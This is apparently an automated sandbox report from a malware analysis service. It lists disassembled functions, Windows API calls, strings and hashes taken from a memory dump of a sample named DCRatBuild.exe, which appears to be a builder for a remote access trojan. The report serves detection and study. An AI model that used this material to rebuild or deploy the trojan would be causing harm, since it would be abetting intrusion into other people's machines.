\\?\, xrefs: 00B1BB52, 00B1BB99, 00B1BBF7, 00B1BC4E
UNC, xrefs: 00B1BBA7

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 72eefa439ec2bc3f7b4d8749448679a58101a36608e6a6ba3bc52f1de156fd43
Instruction ID: 2328d2b1253d46cad75ceda57f64ef21fa55c190233f1e7a3ece49ff86753ac6
Opcode Fuzzy Hash: 72eefa439ec2bc3f7b4d8749448679a58101a36608e6a6ba3bc52f1de156fd43
Instruction Fuzzy Hash: DF419131440225BACF21BF60DC41EEB77E9EF45790FA444E9F859A3152EB70DAD09BA0

Function 00B2B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00B2B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00B2B712
DeleteObject.GDI32(00000000), ref: 00B2B744
DeleteObject.GDI32(00000000), ref: 00B2B767

Part of subcall function 00B2A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B2B73D,00000066), ref: 00B2A6D5
Part of subcall function 00B2A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00B2B73D,00000066), ref: 00B2A6EC
Part of subcall function 00B2A6C2: LoadResource.KERNEL32(00000000,?,?,?,00B2B73D,00000066), ref: 00B2A703
Part of subcall function 00B2A6C2: LockResource.KERNEL32(00000000,?,?,?,00B2B73D,00000066), ref: 00B2A712
Part of subcall function 00B2A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B2B73D,00000066), ref: 00B2A72D
Part of subcall function 00B2A6C2: GlobalLock.KERNEL32(00000000), ref: 00B2A73E
Part of subcall function 00B2A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B2A762
Part of subcall function 00B2A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B2A7A7
Part of subcall function 00B2A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00B2A7C6
Part of subcall function 00B2A6C2: GlobalFree.KERNEL32(00000000), ref: 00B2A7CD

Strings

], xrefs: 00B2B71A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 80b21ba20cd1a3697358081cc962a1d5b786139aa3e9f353d786768b48243728
Instruction ID: 0b3b39ea6ccd193e92748228d7a826d20e7f6936d28f129b8636447996e1b45f
Opcode Fuzzy Hash: 80b21ba20cd1a3697358081cc962a1d5b786139aa3e9f353d786768b48243728
Instruction Fuzzy Hash: 5701C03650022167C7127774AC09FAF7BFAEBC0B52F180091F908A72A1DF218D0952B1

Function 00B2D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B11316: GetDlgItem.USER32(00000000,00003021), ref: 00B1135A
Part of subcall function 00B11316: SetWindowTextW.USER32(00000000,00B435F4), ref: 00B11370

EndDialog.USER32(?,00000001), ref: 00B2D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B2D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B2D675
SetDlgItemTextW.USER32(?,00000068), ref: 00B2D684

Strings

RENAMEDLG, xrefs: 00B2D618

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 49a23c17ba65b8fe77a9f031110b712a02ef1e415ada0003b388c01fd18ab2c5
Instruction ID: 378c882c210c501a1c3ca2fca08f0252e29c8978e2f61d37614c8cc6dbd412f4
Opcode Fuzzy Hash: 49a23c17ba65b8fe77a9f031110b712a02ef1e415ada0003b388c01fd18ab2c5
Instruction Fuzzy Hash: DA01D833344225BBD2224F64BD09F6777EDFB5AB41F110451F34DA30D0CAA69944AB75

Function 00B37E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B37E24,00000000,?,00B37DC4,00000000,00B4C300,0000000C,00B37F1B,00000000,00000002), ref: 00B37E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B37EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00B37E24,00000000,?,00B37DC4,00000000,00B4C300,0000000C,00B37F1B,00000000,00000002), ref: 00B37EC9

Strings

CorExitProcess, xrefs: 00B37E9E
mscoree.dll, xrefs: 00B37E8C

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 82e38287bc38d7eb04b9bc6d9208090e3ec82d04397e2bd88539a1dc508fa209
Instruction ID: ec556b75279b4491206153028bff9c98c7bee00ac349ed7b5b645f6143bec6c0
Opcode Fuzzy Hash: 82e38287bc38d7eb04b9bc6d9208090e3ec82d04397e2bd88539a1dc508fa209
Instruction Fuzzy Hash: E8F03C75A44219BBCB119BA0DC09BAEBFF8FF45B11F1441E9E805A3260DF709F44CA90

Function 00B1F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B20836
Part of subcall function 00B2081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B1F2D8,Crypt32.dll,00000000,00B1F35C,?,?,00B1F33E,?,?,?), ref: 00B20858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B1F2E4
GetProcAddress.KERNEL32(00B581C8,CryptUnprotectMemory), ref: 00B1F2F4

Strings

CryptUnprotectMemory, xrefs: 00B1F2EA
Crypt32.dll, xrefs: 00B1F2CE
CryptProtectMemory, xrefs: 00B1F2DE

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 5aaba538bd7b22b7dab5caa0ff951d8775a5bdc4e3f323dac05e6399b940a830
Instruction ID: 8c9978f0fcf77dd20625e6111fb447403fa141a964c584b1e9e36e9b7d1692f0
Opcode Fuzzy Hash: 5aaba538bd7b22b7dab5caa0ff951d8775a5bdc4e3f323dac05e6399b940a830
Instruction Fuzzy Hash: AEE086749507129EC720AF38A85DB56BAE4AF05F00F18889DF0DA93650DBB4D680CB50

Function 00B32BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B32CA1
___AdjustPointer.LIBCMT ref: 00B32CC4
_abort.LIBCMT ref: 00B32D12
___AdjustPointer.LIBCMT ref: 00B32D60

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 25ecd5ae96490e1e9fcc2a8b19d969155327bd14750ace7b8aa6a4827da83dd9
Instruction ID: cf6d60e344c10afc7b0e622b709c2419faecf9b4826b19f4e42149e4b5637a2e
Opcode Fuzzy Hash: 25ecd5ae96490e1e9fcc2a8b19d969155327bd14750ace7b8aa6a4827da83dd9
Instruction Fuzzy Hash: B451E372600216AFDB299F18D885BBAB7E4FF54710F3445ADEC06476A1E732ED80DB90

Function 00B3BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B3BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B3BF5C

Part of subcall function 00B38E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B3CA2C,00000000,?,00B36CBE,?,00000008,?,00B391E0,?,?,?), ref: 00B38E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B3BF82
_free.LIBCMT ref: 00B3BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B3BFA4

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d4a02a2883ce58595e9a632285200070f440467967009c3e2e7a841cd6b18ede
Instruction ID: c2ac7828097ba4a6a5b7ced1c43bdd2ea0354a4eeee45b12a3015592a0685a11
Opcode Fuzzy Hash: d4a02a2883ce58595e9a632285200070f440467967009c3e2e7a841cd6b18ede
Instruction Fuzzy Hash: 0A01B1A66016117F2721167A5C98C7B7AEDEEC7FA073401A9FA04D3104EF60CD0185B0

Function 00B39869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00B391AD,00B3B188,?,00B39813,00000001,00000364,?,00B33F73,00000050,?,00B51030,00000200), ref: 00B3986E
_free.LIBCMT ref: 00B398A3
_free.LIBCMT ref: 00B398CA
SetLastError.KERNEL32(00000000,?,00B51030,00000200), ref: 00B398D7
SetLastError.KERNEL32(00000000,?,00B51030,00000200), ref: 00B398E0

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 7a5b7273ac57247dcaf64c4a30ace8115ba9424b30022f98b853248dec19d902
Instruction ID: 252436167320784467ab00dd1eaf8f69a23bd0550e9b0df31d47d5a96e706dd0
Opcode Fuzzy Hash: 7a5b7273ac57247dcaf64c4a30ace8115ba9424b30022f98b853248dec19d902
Instruction Fuzzy Hash: 4701F43A1546016BC31227286C95A1B35F9EFD3BB0F3402B8F515A3292EEA0CE055161

Function 00B20EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00B211CF: ResetEvent.KERNEL32(?), ref: 00B211E1
Part of subcall function 00B211CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B211F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B20F21
CloseHandle.KERNEL32(?,?), ref: 00B20F3B
DeleteCriticalSection.KERNEL32(?), ref: 00B20F54
CloseHandle.KERNEL32(?), ref: 00B20F60
CloseHandle.KERNEL32(?), ref: 00B20F6C

Part of subcall function 00B20FE4: WaitForSingleObject.KERNEL32(?,000000FF,00B21206,?), ref: 00B20FEA
Part of subcall function 00B20FE4: GetLastError.KERNEL32(?), ref: 00B20FF6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 83f4903d4070cba3c06173c6eb4601eed2d8c9b233a35f52d128e1d5803cd432
Instruction ID: aa188c60641b5372a7d05da2e53da82b635ec223c189660a6ff811c654bfc3e7
Opcode Fuzzy Hash: 83f4903d4070cba3c06173c6eb4601eed2d8c9b233a35f52d128e1d5803cd432
Instruction Fuzzy Hash: F8019276000750EFC7329B64DD84BC6BBE9FB08B10F000A69F25A92160CB727B44CB50

Function 00B3C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B3C817

Part of subcall function 00B38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?), ref: 00B38DE2
Part of subcall function 00B38DCC: GetLastError.KERNEL32(?,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?,?), ref: 00B38DF4

_free.LIBCMT ref: 00B3C829
_free.LIBCMT ref: 00B3C83B
_free.LIBCMT ref: 00B3C84D
_free.LIBCMT ref: 00B3C85F

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5d88c2199e08090f4bf364325f785aa24b9f1a8465f3a935ff1f7c28a821f6dc
Instruction ID: f2b9b1dfb72821cf6a4d9517d3eaffa05723cef8fd9819914fb32cd134693973
Opcode Fuzzy Hash: 5d88c2199e08090f4bf364325f785aa24b9f1a8465f3a935ff1f7c28a821f6dc
Instruction Fuzzy Hash: 7BF01232544201AB8660EBA9F885C2677F9FA01B14F7418ADF118E7552CF70FE80CB55

Function 00B21FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B21FE5
_wcslen.LIBCMT ref: 00B21FF6
_wcslen.LIBCMT ref: 00B22006
_wcslen.LIBCMT ref: 00B22014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B1B371,?,?,00000000,?,?,?), ref: 00B2202F

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: c50736272b3a7446d7596887daaa1ac732abb33db9bc7c9ae90a92af8867fb41
Instruction ID: 83725218010bd8d8151f1cfa7d6e3612b0ca0501e25e42f46953032478f7bcf5
Opcode Fuzzy Hash: c50736272b3a7446d7596887daaa1ac732abb33db9bc7c9ae90a92af8867fb41
Instruction Fuzzy Hash: 71F01D32408024BBCF266F51EC09D8B7FA6EB45B60F218495F61A9B061CB729661D6A0

Function 00B38900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B3891E

Part of subcall function 00B38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?), ref: 00B38DE2
Part of subcall function 00B38DCC: GetLastError.KERNEL32(?,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?,?), ref: 00B38DF4

_free.LIBCMT ref: 00B38930
_free.LIBCMT ref: 00B38943
_free.LIBCMT ref: 00B38954
_free.LIBCMT ref: 00B38965

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c40406e7027574d0fc79e7059cd6d2b0c30170dd621e976c6e29d093fea88c54
Instruction ID: b3e9d173690b55969e1f3bf85eccf9af035ef6611d3ca059954bd0b55c285ecc
Opcode Fuzzy Hash: c40406e7027574d0fc79e7059cd6d2b0c30170dd621e976c6e29d093fea88c54
Instruction Fuzzy Hash: A8F0FE758103269BCA467F14FC024153FF1F725B14721169AF52C672B2CF31CA81EB82

Function 00B215FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B217BC
_swprintf.LIBCMT ref: 00B2186B

Strings

%ls, xrefs: 00B21641, 00B21657
%s: %s, xrefs: 00B217CB

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 7eb5f02cf0821db25d5c6619ac3d8382e44b3c8794bfdd0ed10ab46c6eb6710b
Instruction ID: 9eb079ebcf139bb7ccddf17721eec3c77b2c8594b821064e9862f47902a44300
Opcode Fuzzy Hash: 7eb5f02cf0821db25d5c6619ac3d8382e44b3c8794bfdd0ed10ab46c6eb6710b
Instruction Fuzzy Hash: E0513E71244320F6E6221B9CADC6F3972D5EB34B00F244DC6F79E780F1C9A6A951A71B

Function 00B37F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 00B37FAE
_free.LIBCMT ref: 00B38079
_free.LIBCMT ref: 00B38083

Strings

C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, xrefs: 00B37FA5, 00B37FAC, 00B37FDB, 00B38013

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
API String ID: 2506810119-119056061
Opcode ID: b125d85b9d04c6cd58825e375b22cf352820389e7892d872f81270db0d8a1235
Instruction ID: 017094388816896f59d476e0153b21a39ef46b8712595ba1dae809c827d61de6
Opcode Fuzzy Hash: b125d85b9d04c6cd58825e375b22cf352820389e7892d872f81270db0d8a1235
Instruction Fuzzy Hash: 733193B1A44318AFDB25DF95D885D9EBBFCEF85710F2040E6F90497211DAB09E84CB52

Function 00B331D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B331FB
_abort.LIBCMT ref: 00B33306

Strings

MOC, xrefs: 00B3320D
RCC, xrefs: 00B33215

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 82a064c4e47246f65d44aa8224f955db3f13d19f6d07ad84a497efcbd101f2b5
Instruction ID: 8d1c11e4eaacbfbf4f75521996aab5b2b85f7a92cf3cc3867ad06462240b6b40
Opcode Fuzzy Hash: 82a064c4e47246f65d44aa8224f955db3f13d19f6d07ad84a497efcbd101f2b5
